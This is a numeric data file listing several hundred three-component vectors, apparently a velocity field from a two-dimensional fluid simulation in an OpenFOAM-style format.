(-7.28216088063e-05 -0.000344413402996 0)
(-2.81786506039e-05 -0.000300549739365 0)
(-5.87033825465e-05 -0.000989705036223 0)
(-0.00017793424483 -0.00108124453408 0)
(-0.000181622717264 -0.000833795746315 0)
(-0.000223392174156 -0.000776152799227 0)
(-0.000373708525859 -0.00102893333132 0)
(-0.000384515503793 -0.000988614765658 0)
(-0.000461735952689 -0.000998689067319 0)
(-0.000499429451934 -0.0009191372305 0)
(-0.000559443698765 -0.000818672313228 0)
(-0.000581051983515 -0.000654517422636 0)
(-0.000629009893076 -0.000552094762284 0)
(-0.000737774822496 -0.00055573493799 0)
(-0.000807231213926 -0.000579225227542 0)
(-0.000984279264436 -0.000697808994917 0)
(-0.00107895252026 -0.000694245316589 0)
(-0.00105420383682 -0.000587691298497 0)
(-0.00114468935988 -0.000585514329375 0)
(-0.00123821092661 -0.000616401334054 0)
(-0.00130584847532 -0.000619826857997 0)
(-0.00136138700362 -0.000601554499206 0)
(-0.00141752107478 -0.0005739899901 0)
(-0.00148129566101 -0.000540755592335 0)
(-0.00154857916323 -0.00048438737939 0)
(-0.00159472165029 -0.000428450033777 0)
(-0.00156009977477 -0.000393625994057 0)
(-0.001586384739 -0.000349094037917 0)
(-0.00169280810559 -0.000323162038656 0)
(-0.00166700647388 -0.000303572734108 0)
(-0.00178686680055 -0.000290466399776 0)
(-0.00174287886098 -0.000270368782662 0)
(-0.00177119733462 -0.000268273451687 0)
(-0.00184867818566 -0.000282338375983 0)
(-0.00192226390576 -0.000292110711132 0)
(-0.00194672166526 -0.000272069840284 0)
(-0.00196802261429 -0.000245290118382 0)
(-0.00198980377151 -0.00021631090008 0)
(-0.00200932486199 -0.000185972224963 0)
(-0.00202582833068 -0.000154977227341 0)
(-0.00203956366118 -0.000122968154419 0)
(-0.00205041920406 -8.89856942269e-05 0)
(-0.00205866047323 -5.22554449393e-05 0)
(-0.00206420344361 -1.2924028229e-05 0)
(-0.00206615829302 2.80937985667e-05 0)
(-0.0020638179518 7.01629279712e-05 0)
(-0.00205685693646 0.000113548559139 0)
(-0.00204477806883 0.000159163397774 0)
(-0.00202673998978 0.0002080686677 0)
(-0.00200199104742 0.00026114789782 0)
(-0.00197012314226 0.000319151991714 0)
(-0.0019308681897 0.000383129941071 0)
(-0.00188384171103 0.000455007021773 0)
(-0.0018283209789 0.000538159578172 0)
(-0.00176245901403 0.000637692301876 0)
(-0.00168220953088 0.000759500726215 0)
(-0.00158166265759 0.000907270611813 0)
(-0.00145550686008 0.00107906067807 0)
(-0.00130588347441 0.00127060380642 0)
(-0.00112248866356 0.00149588339486 0)
(-0.000900278564756 0.00167930423866 0)
(-0.000684140499884 0.00176404839232 0)
(-0.000529626020588 0.00172327090969 0)
(-0.00045963358971 0.00166753671679 0)
(-0.000371087567389 0.00176130552011 0)
(-0.000182964056108 0.00185320856642 0)
(5.01115642249e-05 0.00184805991062 0)
(0.000259739472019 0.00178130040282 0)
(0.000443740692207 0.00173672041378 0)
(0.00084841251343 0.00163672964582 0)
(0.000979213549541 0.00104204815553 0)
(0.00126755216616 0.000765524173133 0)
(0.00156910858066 0.000238620915182 0)
(0.00152359039455 -0.000702460461605 0)
(0.00102508508247 -0.00125643663288 0)
(0.000475517588968 -0.00134147075145 0)
(6.54918310389e-05 -0.00115265697291 0)
(-0.000171502647687 -0.000860223529413 0)
(-0.000237910366621 -0.000567168568883 0)
(-0.000188960789018 -0.000374623614301 0)
(-0.000119071859961 -0.000293141381869 0)
(-4.44208558603e-05 -0.000230158807004 0)
(-4.49883268581e-05 -0.0010941501959 0)
(-0.0001305394846 -0.00114290491245 0)
(-0.0001684437393 -0.000879495240599 0)
(-0.000264176148327 -0.000881065204642 0)
(-0.000321262287085 -0.000978725159196 0)
(-0.000348980495753 -0.00104453043168 0)
(-0.00044857490934 -0.0010698214341 0)
(-0.000454409057271 -0.000937055427395 0)
(-0.00056782477416 -0.000936673498989 0)
(-0.000563590465971 -0.000699692330432 0)
(-0.000637732674261 -0.000634595719916 0)
(-0.000729079415741 -0.000649006138415 0)
(-0.000805983481699 -0.000689580112919 0)
(-0.000962856921573 -0.000802879453478 0)
(-0.00104219587855 -0.000761892555587 0)
(-0.00102241610167 -0.000640994157131 0)
(-0.00112858435219 -0.000664994752532 0)
(-0.0012132736701 -0.000692564418752 0)
(-0.00127827274997 -0.000684497066388 0)
(-0.00133813964818 -0.00066123412331 0)
(-0.0013892810779 -0.000633128384128 0)
(-0.00145741785349 -0.000604916252788 0)
(-0.00147790831105 -0.000529392553292 0)
(-0.0015967020662 -0.000461874558898 0)
(-0.00158637455294 -0.000413705719201 0)
(-0.00157559359179 -0.000395842783613 0)
(-0.00171143080471 -0.000373069616746 0)
(-0.00166120832445 -0.00033380815256 0)
(-0.00169534797576 -0.000319825955697 0)
(-0.00179366687164 -0.00031303823518 0)
(-0.00181342645563 -0.000320114956381 0)
(-0.00189062064599 -0.000340456686782 0)
(-0.00191553997153 -0.00033173292895 0)
(-0.00194556936871 -0.000301344438093 0)
(-0.00197154349546 -0.000269349257485 0)
(-0.00199487862303 -0.000237589109121 0)
(-0.00201599773999 -0.000204939697769 0)
(-0.00203417508327 -0.000171276506698 0)
(-0.00204984999172 -0.000136187302337 0)
(-0.00206198423779 -9.92091481297e-05 0)
(-0.00207047878594 -5.98121316755e-05 0)
(-0.00207636973565 -1.74984356444e-05 0)
(-0.00207936767321 2.73850110629e-05 0)
(-0.00207819154686 7.40856900628e-05 0)
(-0.00207219865614 0.000122657179825 0)
(-0.00206084032194 0.000174102452043 0)
(-0.00204310261225 0.000229558269886 0)
(-0.00201808878125 0.000289717442328 0)
(-0.00198543052014 0.000355022497072 0)
(-0.00194511816233 0.000426412124789 0)
(-0.00189727798606 0.000506147680924 0)
(-0.00184175215964 0.000598562037773 0)
(-0.00177697869045 0.000710293728752 0)
(-0.00169862713415 0.000848491625768 0)
(-0.00159967879198 0.00101636068162 0)
(-0.00147565740919 0.00121178580332 0)
(-0.00133800806005 0.00143485442739 0)
(-0.00113160227869 0.00175386800517 0)
(-0.000852364382771 0.00195505346478 0)
(-0.000595122993642 0.00199271751679 0)
(-0.000440822019522 0.00183499163795 0)
(-0.000469264886765 0.00171514669039 0)
(-0.000441788356094 0.00200963839949 0)
(-0.000177838813352 0.00223845315618 0)
(0.000165701375867 0.00219255950573 0)
(0.000448187789838 0.0020228085159 0)
(0.000605882800863 0.00185985280404 0)
(0.00087693104053 0.00189818193623 0)
(0.00109509006367 0.00134289644259 0)
(0.00155798403407 0.00121514066055 0)
(0.00218870899914 0.000510183216451 0)
(0.00220718604268 -0.00115595590316 0)
(0.00123397900963 -0.00189696750833 0)
(0.000348256704153 -0.00187515179819 0)
(-0.00021703081013 -0.00149488998619 0)
(-0.000484752186675 -0.000988982263472 0)
(-0.000468733213007 -0.000498531571897 0)
(-0.000296498378183 -0.000246412113297 0)
(-0.000172312635404 -0.000224581399224 0)
(-7.19223565826e-05 -0.000122085868872 0)
(-3.28757814519e-05 -0.00116557012455 0)
(-8.35677091687e-05 -0.00119260787503 0)
(-0.000160162168618 -0.000955010727749 0)
(-0.000270571690422 -0.000962675225266 0)
(-0.000292992514366 -0.000974954788782 0)
(-0.000354102005292 -0.00111607240319 0)
(-0.000444554404499 -0.00113537820881 0)
(-0.000406059585976 -0.000896191421672 0)
(-0.000570837934599 -0.00103130163178 0)
(-0.000543216234178 -0.000740223236483 0)
(-0.000635089516597 -0.000707700973917 0)
(-0.000716735536506 -0.000734723741396 0)
(-0.000794147347023 -0.000789769057905 0)
(-0.0009388052275 -0.000890497932378 0)
(-0.000914872332992 -0.000755868649169 0)
(-0.00097410043843 -0.000701262499654 0)
(-0.0011023752135 -0.000754493697183 0)
(-0.00118201610397 -0.000769040369515 0)
(-0.00124716173428 -0.00074924736646 0)
(-0.00131027098367 -0.000720068175943 0)
(-0.00136600828696 -0.000690798618782 0)
(-0.00144281692165 -0.000664702976276 0)
(-0.00142601168241 -0.000575011591193 0)
(-0.00147544551005 -0.000487338229816 0)
(-0.00161542110918 -0.00046016176089 0)
(-0.0015707743457 -0.000430944089087 0)
(-0.00161042587665 -0.000388427664214 0)
(-0.00168644636896 -0.000365266156176 0)
(-0.00169001112337 -0.000367011338971 0)
(-0.00172862797442 -0.000359647909163 0)
(-0.00178896156607 -0.000371724007285 0)
(-0.00188803810209 -0.000390535103896 0)
(-0.00191507015782 -0.000365989303971 0)
(-0.00194536051958 -0.000331304391482 0)
(-0.00197458260677 -0.00029607141349 -1.0879831387e-28)
(-0.00200017650391 -0.000261132351521 1.06481593005e-28)
(-0.00202344415882 -0.000225518646991 0)
(-0.00204270159658 -0.000188995632874 0)
(-0.00205954292294 -0.000151082860557 0)
(-0.00207414366794 -0.000110868341315 0)
(-0.00208420092514 -6.81550734155e-05 0)
(-0.00209041824866 -2.27103800843e-05 0)
(-0.00209401794671 2.57576983629e-05 0)
(-0.00209419593132 7.69232399399e-05 0)
(-0.00208963904564 0.000130750071427 0)
(-0.00207941816382 0.000188286594506 0)
(-0.00206240887173 0.000250791510715 0)
(-0.00203759040241 0.00031866211472 0)
(-0.00200461034221 0.000391729512373 0)
(-0.001963849405 0.000470542421498 0)
(-0.00191618194395 0.00055746666349 0)
(-0.00186224861357 0.000657564239903 0)
(-0.00180124427188 0.000778798260414 0)
(-0.00172896073459 0.000930194778113 0)
(-0.00163741801964 0.0011161364147 0)
(-0.00152567445454 0.00133995194096 0)
(-0.00143752632217 0.00160479630199 0)
(-0.00118868153506 0.00212005666316 0)
(-0.000812062743362 0.00221386685715 0)
(-0.000465109241438 0.00211900622776 0)
(-0.000282179102757 0.00155932548329 0)
(-0.000552623111584 0.000722043589609 0)
(-0.000544390917244 0.000725393582693 0)
(0.000119246576962 0.00091610151466 0)
(0.000875599515762 0.000980100820288 0)
(0.00140736655106 0.000962486119086 0)
(0.00168109615553 0.000974478535476 0)
(0.00197020253436 0.00121778971365 0)
(0.00181367301552 0.00152266152687 0)
(0.00255297787627 0.00179792056638 0)
(0.00374830485405 0.00204897929705 0)
(0.00359034910619 -0.00293040674657 0)
(0.0015809406785 -0.00403429160191 0)
(7.70182525459e-05 -0.00318366432004 0)
(-0.000703452145024 -0.00212692872664 0)
(-0.000980686021909 -0.00116225762008 0)
(-0.000798811268072 -0.000270150973267 0)
(-0.000374892078028 1.13611133271e-05 0)
(-0.000200309986674 -0.000169038768281 0)
(-0.000123277249087 6.00241142096e-05 0)
(-3.56960242216e-05 -0.00123465547033 0)
(-9.91640898341e-05 -0.00124499462431 0)
(-0.000176674522028 -0.00122634593803 0)
(-0.00022274170235 -0.00102870845012 0)
(-0.000281647689138 -0.00104415458836 0)
(-0.000364416291385 -0.00118962095439 0)
(-0.000439324779967 -0.00119323338942 0)
(-0.00042037884925 -0.000960352222644 0)
(-0.000587064498949 -0.00110550679716 0)
(-0.000529750347502 -0.000788725683908 0)
(-0.000631556074052 -0.000780932544756 0)
(-0.000707177108236 -0.000814710935644 0)
(-0.000782925455133 -0.00087598328819 0)
(-0.000920955928767 -0.000964634277495 0)
(-0.000877092111016 -0.000799501329839 0)
(-0.000969591146748 -0.000789087761583 0)
(-0.00108193216371 -0.000842285813217 0)
(-0.00115312767073 -0.00084290844901 0)
(-0.00121751454165 -0.000814612588265 0)
(-0.0012783349575 -0.000778883479282 0)
(-0.00134006424308 -0.000747263286313 0)
(-0.00142673693239 -0.000713839432081 0)
(-0.00140335742191 -0.000615802104782 0)
(-0.00145326006306 -0.000556550606953 0)
(-0.00161428136414 -0.000517359936248 0)
(-0.00157019360164 -0.000454510949631 0)
(-0.00159609840912 -0.000440648127622 0)
(-0.00172854138995 -0.000420413015351 0)
(-0.001703731635 -0.000389246268388 0)
(-0.00174529621665 -0.000413731480372 0)
(-0.00184894360165 -0.000449239848859 0)
(-0.00187728872905 -0.000437147492842 0)
(-0.00191136036445 -0.000400642244399 0)
(-0.0019453108718 -0.000362743254132 0)
(-0.00197750179013 -0.000324962388414 0)
(-0.00200444147067 -0.000286732990086 0)
(-0.00202973183245 -0.000248158016649 0)
(-0.00205265423562 -0.000208541765529 0)
(-0.00207057062465 -0.000167500224899 0)
(-0.00208596397968 -0.00012428189388 0)
(-0.00209840403999 -7.80567294553e-05 0)
(-0.002106308923 -2.89175405297e-05 0)
(-0.0021107282186 2.32297325833e-05 0)
(-0.00211207062691 7.85436386704e-05 0)
(-0.00210922301791 0.000137386363713 0)
(-0.00210076225565 0.000201082421428 0)
(-0.00208524982943 0.000271082433376 0)
(-0.00206146822623 0.000347409299311 0)
(-0.0020288873945 0.000428764453883 0)
(-0.00198851359439 0.000514703763632 0)
(-0.0019424909729 0.000607685904116 0)
(-0.00189168979831 0.00071287233221 0)
(-0.00183689101871 0.000838577772308 0)
(-0.00177426260338 0.000996821672821 0)
(-0.00170184743145 0.0012057292063 0)
(-0.00163570501996 0.00149374924826 0)
(-0.00173068366356 0.0013549477546 0)
(-0.00149346505869 0.0011500191484 0)
(-0.000675473830137 0.00112937081424 0)
(0.000460355104782 0.00115211502668 0)
(0.00266832692029 0.00135270132753 0)
(0.00977783558669 0.00388660424704 0)
(0.0290424997598 0.00837435117969 0)
(0.0389172417261 0.00758477159043 0)
(0.0487751021074 0.00615286987315 0)
(0.0574543670302 0.00463340149462 0)
(0.0636406501148 0.00301080670138 0)
(0.0662772072858 0.000942937143574 0)
(0.0634246279859 -0.00235613351047 0)
(0.0614317931604 -0.00891718878996 0)
(0.0120385586119 -0.00271504790211 0)
(0.00687881723743 -0.001945367352 0)
(0.00122344440082 -0.00156966915993 0)
(-0.000951915534504 -0.00115061189258 0)
(-0.0018318991208 -0.00062205005078 0)
(-0.00202104137861 2.24402995199e-06 0)
(-0.00126643377289 0.000587339399644 0)
(-0.000311886412479 0.000916438420289 0)
(-0.000174159602418 -0.000584496380884 0)
(-0.000251945130702 0.0003198833339 0)
(-3.80171371509e-05 -0.00130484766732 0)
(-0.000125175972821 -0.00130418938451 0)
(-0.00013551360263 -0.00108379736295 0)
(-0.000172878575971 -0.00109918820792 0)
(-0.000261165846873 -0.00111930745466 0)
(-0.000363655609587 -0.00126199526661 0)
(-0.000433815078473 -0.00124141390012 0)
(-0.000446264393168 -0.00103359035029 0)
(-0.000591860659756 -0.00116644926839 0)
(-0.000517464349061 -0.00084551795918 0)
(-0.000627232306068 -0.000857362331057 0)
(-0.000701642743913 -0.000893498536743 0)
(-0.000780533573863 -0.000957675733503 0)
(-0.000907695531098 -0.00102772268888 0)
(-0.000876241556658 -0.000858990445421 0)
(-0.000977100830068 -0.000871803394256 0)
(-0.00107016530023 -0.000919132754604 0)
(-0.00113251221324 -0.000911508719201 0)
(-0.00119367948371 -0.000878947756748 0)
(-0.00125399222931 -0.000840624538076 0)
(-0.00131433526765 -0.000804349502386 0)
(-0.00140058762468 -0.000764534328386 0)
(-0.00142085644873 -0.000678530572786 0)
(-0.00143929012492 -0.00060950764758 0)
(-0.00150048688136 -0.000535607505957 0)
(-0.00160663927518 -0.000504995370158 0)
(-0.00158765285958 -0.000488808118617 0)
(-0.00162206812628 -0.000459814999853 0)
(-0.00177164712323 -0.000463329037053 0)
(-0.00181516801327 -0.000481421485679 0)
(-0.00185029711804 -0.000490656821334 0)
(-0.00187993687313 -0.000469995753401 0)
(-0.00191335908703 -0.000435443488365 0)
(-0.00194757993307 -0.000395962004463 0)
(-0.0019795111133 -0.000355181062048 0)
(-0.00200945676426 -0.000314463834518 -1.03929309724e-28)
(-0.0020364272372 -0.000273116470277 1.01767052142e-28)
(-0.00206061939541 -0.000230292233817 0)
(-0.00208247812187 -0.000185813890278 0)
(-0.00209930475126 -0.000139322126822 0)
(-0.00211295431507 -8.98357278958e-05 0)
(-0.00212309766132 -3.68490244384e-05 0)
(-0.00212937900992 1.94335472971e-05 0)
(-0.00213219872545 7.885669013e-05 0)
(-0.00213109646081 0.00014207655995 0)
(-0.00212515059253 0.000211487883921 0)
(-0.00211239387883 0.000289514267776 0)
(-0.00209046361181 0.000375344625972 0)
(-0.00205917443898 0.000465178705493 0)
(-0.00202114983404 0.000557515537199 0)
(-0.00197850556356 0.000655501594553 0)
(-0.0019316348129 0.000762603462885 0)
(-0.00188373680499 0.000884084737005 0)
(-0.00183997406699 0.00104187787244 0)
(-0.00183104321396 0.00123929841753 0)
(-0.00153250160846 0.000791576454626 0)
(-0.000839369939323 0.000666998422265 1.35902827484e-28)
(0.00513449240022 0.00517201132873 -2.29659139331e-27)
(0.016769527666 0.0074716436613 0)
(0.0291999288426 0.00938620344724 0)
(0.0423662501196 0.0132261046107 0)
(0.0541725778035 0.0187446350895 0)
(0.0632897197205 0.0207083812355 0)
(0.0710822414803 0.0195944278356 0)
(0.079181428794 0.0171272996731 0)
(0.0869724008584 0.013913669628 0)
(0.0935844790512 0.00978566650851 0)
(0.0987855475737 0.00422517134602 0)
(0.102128291467 -0.0038013513227 0)
(0.107583312746 -0.0161623911471 0)
(0.11034374574 -0.028614421282 0)
(0.112970084145 -0.0236038360294 0)
(0.107127096173 -0.0168713360643 0)
(0.0961525498695 -0.0124100216733 0)
(0.0820332523282 -0.00998208441014 0)
(0.0644338701059 -0.00886671732449 0)
(0.0448539410776 -0.00950969773189 0)
(0.00254674998227 -0.000504522675852 0)
(0.000411295842672 0.000662615337225 0)
(-0.000888303830398 0.00146443140659 0)
(-3.44837937013e-05 -0.00137789954685 0)
(-0.000113588612271 -0.00137391495597 0)
(-0.000125465307865 -0.00112581096896 0)
(-0.000165388371578 -0.00118100384896 -1.94448122013e-29)
(-0.000257668115509 -0.00122324290063 2.00494462268e-29)
(-0.000358306354888 -0.00132965069945 0)
(-0.00041327127495 -0.00128634759251 0)
(-0.000460833687257 -0.00111794408835 0)
(-0.000525917863808 -0.00108013848372 0)
(-0.000518394133869 -0.000913749556537 0)
(-0.00062267614826 -0.000940293747092 0)
(-0.000698839663328 -0.000974356283946 0)
(-0.00078564867972 -0.00104167588527 0)
(-0.000898938391281 -0.00108667369836 0)
(-0.000874047463327 -0.000921003581644 0)
(-0.000980803191366 -0.000949653985489 0)
(-0.00105983465011 -0.00098696432536 0)
(-0.00111738415567 -0.000974197770019 0)
(-0.00117558774945 -0.000941205920837 0)
(-0.0012345844881 -0.00090211670275 0)
(-0.00129358583804 -0.000863158550285 0)
(-0.00136858460241 -0.000818116097611 0)
(-0.0014298786751 -0.000742056990393 0)
(-0.0014364459923 -0.000653413709199 0)
(-0.00147226249841 -0.000592295216999 0)
(-0.00164450544344 -0.000571545679371 0)
(-0.00159549089802 -0.000518982182131 0)
(-0.00162168568165 -0.000521817956686 0)
(-0.0016736170246 -0.00051868618678 0)
(-0.00178336494981 -0.000535316011113 0)
(-0.0018383074224 -0.000535044942749 0)
(-0.00187659068838 -0.000507315480963 0)
(-0.00191284238383 -0.000470297165848 0)
(-0.00194731994006 -0.000429464715005 0)
(-0.00198402686803 -0.000387552684897 0)
(-0.0020146600459 -0.000343967593409 0)
(-0.00204405369665 -0.000299969690365 0)
(-0.00206967508945 -0.000254255013227 0)
(-0.00209341314815 -0.000206496495018 0)
(-0.00211329449004 -0.000156337511689 0)
(-0.00212861064882 -0.000103478028821 0)
(-0.00214058960618 -4.70482722467e-05 0)
(-0.00214965918703 1.35072413219e-05 0)
(-0.00215509347186 7.75767293223e-05 0)
(-0.00215596583918 0.00014491363854 0)
(-0.0021518573348 0.00021891533627 0)
(-0.00214215955134 0.000304357424562 0)
(-0.00212404685942 0.000400131195131 0)
(-0.00209784156391 0.00049911936385 0)
(-0.0020644911089 0.000597535913623 0)
(-0.00202544377426 0.000699891551344 0)
(-0.00198193138555 0.000806783471126 0)
(-0.00194091251441 0.000919949440715 0)
(-0.00188516267464 0.000990145808099 0)
(-0.0014191797126 0.000543964099078 0)
(-0.00125405313455 0.0023344796082 0)
(0.0130607112969 0.0107084591079 0)
(0.0250404929021 0.017219524881 0)
(0.0374746462541 0.0216770574775 0)
(0.0502423592453 0.0245492600453 0)
(0.0630921889593 0.0266739125292 0)
(0.0750471887854 0.0283171556977 0)
(0.0853453317655 0.0287740303688 0)
(0.0944799269758 0.0272649235838 0)
(0.103201547537 0.0243265360864 0)
(0.111469135637 0.0203301094869 0)
(0.118973740186 0.0152286236058 0)
(0.125715908017 0.00876528356591 0)
(0.132033125802 0.000721359698347 0)
(0.138436166603 -0.00886833972833 0)
(0.145140184956 -0.0155269054898 0)
(0.149274509502 -0.017077263549 0)
(0.148143771574 -0.0182907513252 0)
(0.141339081742 -0.021117603402 0)
(0.129580098057 -0.0254194190673 0)
(0.113206415062 -0.0306691565822 0)
(0.0934996227941 -0.0360031480702 0)
(0.0679088457789 -0.0384912194684 0)
(0.0402986863398 -0.0198563157385 0)
(2.92329924712e-05 0.0011881158086 0)
(-3.10112793182e-05 -0.00144553339354 0)
(-0.000109785611653 -0.00144172561072 0)
(-0.000116062880205 -0.00110943518717 0)
(-0.000164141939295 -0.00126248353364 0)
(-0.000263591451278 -0.00133947418286 0)
(-0.000351823641096 -0.00139133457282 0)
(-0.000393512483246 -0.00133369402579 0)
(-0.000460692123072 -0.00121236056292 0)
(-0.000521715542808 -0.00110949799949 0)
(-0.000536070938067 -0.000977782595439 0)
(-0.000627386629484 -0.00102046238338 0)
(-0.000699129756361 -0.00105605541119 0)
(-0.000792899526672 -0.00112637190876 0)
(-0.000886694884806 -0.00114151616776 0)
(-0.00086393059577 -0.000984101280632 0)
(-0.000975419988422 -0.0010262312867 0)
(-0.00104632160876 -0.00105155227417 0)
(-0.00110307620559 -0.00103343471596 0)
(-0.00115941892103 -0.00100103373499 0)
(-0.00121660598127 -0.000961833906438 0)
(-0.00127499256733 -0.000922179285685 0)
(-0.00134390627276 -0.000877822863408 0)
(-0.00141814662804 -0.000805975308472 0)
(-0.00142925505961 -0.000704160186521 0)
(-0.00145894670432 -0.000644515295416 0)
(-0.00153340250791 -0.000590382912281 0)
(-0.00162429589216 -0.000563314397645 0)
(-0.00163340312248 -0.000561458132249 0)
(-0.00168408333049 -0.000583703896105 0)
(-0.00179109814428 -0.000612164203455 0)
(-0.00182043956098 -0.000585549925425 0)
(-0.00186422771133 -0.000547585213895 0)
(-0.00190210092851 -0.000506850525704 0)
(-0.00194388854087 -0.000466528211389 0)
(-0.00198264564327 -0.000422632275006 0)
(-0.00201976845803 -0.000376359815829 0)
(-0.00205002799936 -0.000328762993603 9.90094991501e-29)
(-0.00207915013693 -0.000280418787156 -9.69015645256e-29)
(-0.00210461630666 -0.000229384324336 0)
(-0.00212700861859 -0.000175843741838 0)
(-0.00214548449696 -0.000119598940014 0)
(-0.00215968641159 -5.94759776825e-05 0)
(-0.00216979918647 5.48611131391e-06 0)
(-0.0021780805282 7.44617337001e-05 0)
(-0.00218161577022 0.000144741770114 0)
(-0.0021805309465 0.000220907098589 0)
(-0.00217580864057 0.000315052079174 0)
(-0.00216426056227 0.000425365738706 0)
(-0.00214413793262 0.00053234465356 0)
(-0.00211698968878 0.000633297698466 0)
(-0.00208434711703 0.000739277284662 0)
(-0.00205211544711 0.000854728558935 0)
(-0.00195260945598 0.000894992312347 0)
(-0.00143082573424 0.000424294797944 0)
(0.00357725169944 0.00467251938142 0)
(0.0187374134168 0.0159994157792 0)
(0.032045742321 0.0241393688101 0)
(0.0450262432951 0.0300658277673 0)
(0.0579940357945 0.0342721839093 0)
(0.0708698673775 0.0369959028445 0)
(0.0834639696153 0.0386323774716 0)
(0.0953839385338 0.039371687569 0)
(0.10631986677 0.038939766564 0)
(0.116383366507 0.0369557841879 0)
(0.125855005681 0.0335512250592 0)
(0.134796683503 0.0289306994896 0)
(0.143124757223 0.0231386507193 0)
(0.150823131031 0.0161337045459 0)
(0.158142565099 0.00800220646196 0)
(0.164872385331 -0.000842651346291 0)
(0.171137644396 -0.0088969053626 0)
(0.17560197854 -0.0157293564977 0)
(0.176169770004 -0.0224033304552 0)
(0.171906001837 -0.0300444064574 0)
(0.162771758548 -0.0390012362135 0)
(0.14850710162 -0.0490341877631 0)
(0.128585433871 -0.0590810616464 0)
(0.100437140348 -0.0657334306919 0)
(0.0627284009628 -0.0623388238243 0)
(0.0186905313783 -0.0613003760897 0)
(-2.58860220522e-05 -0.00150615817265 0)
(-9.1422765955e-05 -0.00150426677357 0)
(-0.000104578474996 -0.00109558826074 0)
(-0.000181768330647 -0.00133767250493 0)
(-0.000277869739391 -0.0014323848293 0)
(-0.00035176515716 -0.00144772792989 0)
(-0.000382710820657 -0.00136727057725 0)
(-0.000476163971907 -0.00133775354292 0)
(-0.000516673155238 -0.00113675523822 0)
(-0.000547914080665 -0.00103609891654 0)
(-0.000630930293165 -0.0010949617774 0)
(-0.000695603150952 -0.0011358583133 0)
(-0.000795080203986 -0.00120614867977 0)
(-0.000839680120006 -0.00115512877896 0)
(-0.000853658714612 -0.00105480695612 -1.42908787372e-28)
(-0.000959334774917 -0.00110231124507 1.51801408295e-28)
(-0.00102711686401 -0.00111479565544 0)
(-0.0010834206461 -0.00109054099395 0)
(-0.00114185316074 -0.00106033999368 0)
(-0.00119735176756 -0.00102043921951 0)
(-0.00125525233693 -0.000980368203873 0)
(-0.001320025576 -0.000937293784651 0)
(-0.00139803418936 -0.000868017179619 0)
(-0.00141507796625 -0.000754583738796 0)
(-0.00145471517288 -0.000692419827132 0)
(-0.00149764096178 -0.000653413839675 0)
(-0.0016679962828 -0.000657632239061 0)
(-0.00168139937488 -0.000631350520563 0)
(-0.00174493549077 -0.000653591791627 0)
(-0.0017842932993 -0.000656836505253 0)
(-0.00181660280318 -0.000630115534901 0)
(-0.00185258110161 -0.000589262222586 0)
(-0.00189440467128 -0.000547472486217 0)
(-0.00193862882712 -0.000508026406711 0)
(-0.00198109131048 -0.000461405457332 0)
(-0.00201587640216 -0.000410409716873 0)
(-0.00205459632439 -0.000361507186398 0)
(-0.00208662300078 -0.000309930858634 0)
(-0.002115723446 -0.000255249167886 0)
(-0.00214181703612 -0.000197769048462 0)
(-0.00216119763862 -0.000137725202738 0)
(-0.00217768857635 -7.45623651854e-05 8.80715625789e-29)
(-0.00219121779857 -6.46253654364e-06 -8.59852874837e-29)
(-0.00220479021667 6.8379878469e-05 0)
(-0.00221228301238 0.000149453464868 0)
(-0.00219054832972 0.000234605049362 0)
(-0.00214927692962 0.000326073661463 0)
(-0.00213527818243 0.000427709594989 0)
(-0.00216387623537 0.00054347092568 0)
(-0.00215659994738 0.000654111787742 0)
(-0.00214717800776 0.000770617212902 0)
(-0.00206128304571 0.000857804363833 0)
(-0.0015612955077 0.000425724202077 0)
(0.00604953097675 0.00814402608959 0)
(0.0218636695935 0.0201943714384 0)
(0.0364890349027 0.0298778643999 0)
(0.0505138352995 0.0376016136066 0)
(0.0641524560332 0.043337244689 0)
(0.0775240605477 0.0473484196629 0)
(0.0906019214741 0.0498399384317 0)
(0.103277776904 0.0510175192698 0)
(0.115377238375 0.0509958607907 0)
(0.126758050456 0.0497141149104 0)
(0.137433286855 0.0470586430975 0)
(0.14751504093 0.0430636003081 0)
(0.157064767157 0.0378300784976 0)
(0.166073146716 0.0314144853994 0)
(0.174531850905 0.0238427424273 0)
(0.182453537105 0.0151850236277 0)
(0.189918321226 0.00574830265652 0)
(0.195995613099 -0.00401660621819 0)
(0.200529076529 -0.0136884004748 0)
(0.202117693989 -0.0239487784993 0)
(0.199855186204 -0.0356942639246 0)
(0.193175646812 -0.0494549283403 0)
(0.18115995167 -0.0653355643621 0)
(0.162159170144 -0.083048113498 0)
(0.132326893171 -0.101694746672 0)
(0.0902632559771 -0.120664123544 0)
(0.00331644153421 -0.014618050349 0)
(-2.18192896324e-05 -0.0015572944421 0)
(-7.18280816219e-05 -0.0015552704571 0)
(-0.000103369933311 -0.00116493621452 0)
(-0.000209435872768 -0.00145776750141 0)
(-0.000288341195433 -0.00150673360411 0)
(-0.000351354663125 -0.00150352248418 0)
(-0.00037905601799 -0.00139953022373 0)
(-0.000479420956448 -0.0014299235711 0)
(-0.000502592191674 -0.00117310794571 0)
(-0.000548546444526 -0.0010894639945 0)
(-0.000629089825524 -0.00116331546338 0)
(-0.00068626651283 -0.00120933855506 0)
(-0.000788880060752 -0.00128246743596 0)
(-0.000790302782644 -0.00115533544367 0)
(-0.000850203583663 -0.00112478902137 0)
(-0.000942514555034 -0.00117532575594 0)
(-0.00100811749808 -0.0011779053642 0)
(-0.00105253296367 -0.00113620848231 0)
(-0.00112185029849 -0.00111858495618 0)
(-0.00117582777025 -0.00107824552672 0)
(-0.00123369805298 -0.00103784493223 0)
(-0.00129696030034 -0.000997378113211 0)
(-0.00137347030665 -0.000928428732593 0)
(-0.00139549480917 -0.000808889469217 0)
(-0.00144504269606 -0.000746191480858 0)
(-0.00146930812007 -0.000709957952894 0)
(-0.00155247222663 -0.000694552478956 0)
(-0.00160842094875 -0.000674793507951 0)
(-0.0016700739211 -0.00068849305378 0)
(-0.00176021181005 -0.000705770195502 0)
(-0.00180198929574 -0.000674468009225 0)
(-0.00182868132611 -0.00063014666544 0)
(-0.00188806349172 -0.000595580760353 0)
(-0.00193289760181 -0.000553016665521 0)
(-0.00196629670657 -0.000499566263519 0)
(-0.00201530011741 -0.000449525531191 0)
(-0.00205512635167 -0.000398286171861 0)
(-0.00209059840158 -0.000343004710612 9.35595824079e-29)
(-0.00212289404399 -0.000284705406949 -9.14329587184e-29)
(-0.00215281842013 -0.000223241611538 0)
(-0.00217928903992 -0.000159239664088 0)
(-0.00219822830735 -9.22369403738e-05 0)
(-0.00221216316982 -1.82707321853e-05 0)
(-0.00221384711281 6.90887872809e-05 0)
(-0.00220115876652 0.00016661219296 0)
(-0.00217018729698 0.000256005822447 0)
(-0.00214948582007 0.000336222393735 0)
(-0.00216581283759 0.000426831667317 0)
(-0.00216783501044 0.000543339817214 0)
